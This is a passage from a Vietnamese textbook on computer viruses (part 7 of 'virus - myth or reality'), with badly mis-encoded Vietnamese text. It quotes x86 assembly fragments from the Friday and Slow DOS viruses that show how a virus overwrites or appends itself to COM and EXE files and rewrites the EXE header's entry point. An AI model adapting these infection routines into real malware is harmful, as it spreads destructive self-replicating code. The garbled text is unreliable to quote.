virus - huyền thoại hay thực tế phần 7

Tham khảo tài liệu virus - huyền thoại hay thực tế phần 7, công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả
Nội dung trích xuất từ tài liệu:
virus - huyền thoại hay thực tế phần 7 mov DX, CX mov AX, 4200h int 21h ; DI = kÝch th−íc míi ............; Ghi file mov CX, DI ; CX = kÝch th−íc míi - sè byte cÇn ghi xor DX, DX mov AH, 40h ; DS:DX = buffer võa tiÕn h nh xong int 21h(TrÝch Friday virus). +Append File: Ph−¬ng ph¸p n y chÐp progvi v o cuèi file ®èi t−îng, tïy theo lo¹i filesÏ cã c¸ch ®Þnh vÞ kh¸c nhau. §èi víi file COM, mäi chuyÖn ®¬n gi¶n, dêi con trá ®Õn cuèifile, ghi progvi v o, b−íc nh¶y ®Çu ch−¬ng tr×nh ®−îc tÝnh b»ng kÝch th−íc cò cña file míi trõ®i 3 byte. §o¹n m sau minh häa kÜ thuËt n y :; Më file mov AX, 03D02h ; Më ®Ó ®äc ghi int 21h jb error; ChuyÓn ®Õn cuèi file mov BX, AX mov AX, 4202h xor CX, CX xor DX, DX int 21h call writeProgvi .........; ChuyÓn lªn ®Çu file gi lÖnh nh¶y mov AX, 4200h xor CX, CX xor DX, DX int 21h jb error mov AX, filesize add AX, -2 §èi víi file .EXE, dï cã vÎ phøc t¹p víi viÖc ®Þnh vÞ l¹i c¸c ®Çu v o, nh−ng l¹i dÔ d ngvíi c¸c b−íc sau : + TÝnh kÝch th−íc file: cã thÓ ®¬n gi¶n b»ng c¸ch dêi con trá file ®Õn cuèi file, tuy nhiªn,th«ng tin tõ .EXE header còng ®ñ cho phÐp tÝnh kÝch th−íc n y. + Ghi progvi v o cuèi file, t−¬ng tù file COM. + §Þnh vÞ gi¸ trÞ CS v IP, nªn ®Þnh vÞ lu«n SS v SP.§o¹n m sau minh häa c¸ch ®Þnh vÞ :; Gi¶ sö buffer ®äc file l .EXE header, buffer ® ®−îc virus ®äc 28 byte v o.EXE_header : IDFile dw ? ; Gi¸ trÞ 4D5A l file .EXE80www.updatesofts.com PartPage dw ? PageCnt dw ? ReloCnt dw ? HdrSize dw ? MinMem dw ? MaxMem dw ? ReloSS dw ? .EXESP dw ? ChkSum dw ? .EXEIP dw ? ReloCS dw ? TablOff dw ?; Gi¸ trÞ kÝch th−íc file sÏ ®−îc l−u ë ®©y FilesizeHi dw ? ; Pagesize dw 200 FilesizeLo dw ? ; Parasize dw 10h; Gi¸ trÞ ®Çu v o file cò ë ®©y SSValue dw ? SPValue dw ? IPValue dw ? CSValue dw ?; §o¹n m ch−¬ng tr×nh mov ChkSum, 1984h mov AX, ReloSS ; CÊt c¸c entry cña mov SSValue, AX ; CS:IP mov AX, .EXESP ; SS:SP mov SPValue, AX mov AX, .EXEIP mov IPValue, AX mov AX, ReloSS mov CSValue, AX; ChØnh kÝch th−íc file theo ®o¹n mov DX, filesizeHi mov AX, FilesiaeLo add AX, Fh adc DX, 0 and AX, FFF0h mov filesizeHi, DX mov filesizeLo, AX; TÝnh kÝch th−íc míi sau khi céng thªm progvi add AX, 6B4h adc DX, 0 ; KÝch th−íc Progvi l 1716 byte ......... div Pagesize ; §æi sang PartPage v PageCnt or DX, DX ; Cã trang d− kh«ng je next_0 81 inc AX next_0: mov PageCnt, AX mov PartPage, DX; §Þnh l¹i CS, IP, SS, SP mov AX, filesizeLo mov DX, FilesizeHi div Parasize ; §æi kÝch th−íc file ra ®o¹n sub AX, HdrSise mov ReloSS, AX mov .EXEIP, 0 ; §Çu v o IP = 0 mov ReloSS, AX mov .EXESP, 07B4 ; §Æt l¹i Stack; ChuyÓn ®Õn ®Çu file xor CX, CX mov DX, CX mov AX, 4200h int 21h .........; Ghi l¹i .EXE header mov CX, 18h mov DX, offset .EXEHeader mov AH, 40h int 21h; Dêi xuèng cuèi file ®Ó ghi progvi mov DX, filesizeLo mov CX, filesizeHi mov AX, 4200h int 21h .........; Ghi file mov CX, 6B0h ; Ghi progvi v o xor DX, DX mov AH, 40h int 21h(TrÝch Slow Virus)c. KÜ thuËt t×m file ®èi t−îng: §iÒu quan träng cña virus l ph¶i l©y lan, do ®ã, t×m kiÕm 1 file®èi t−îng l ®iÒu quan träng.§èi víi TF ...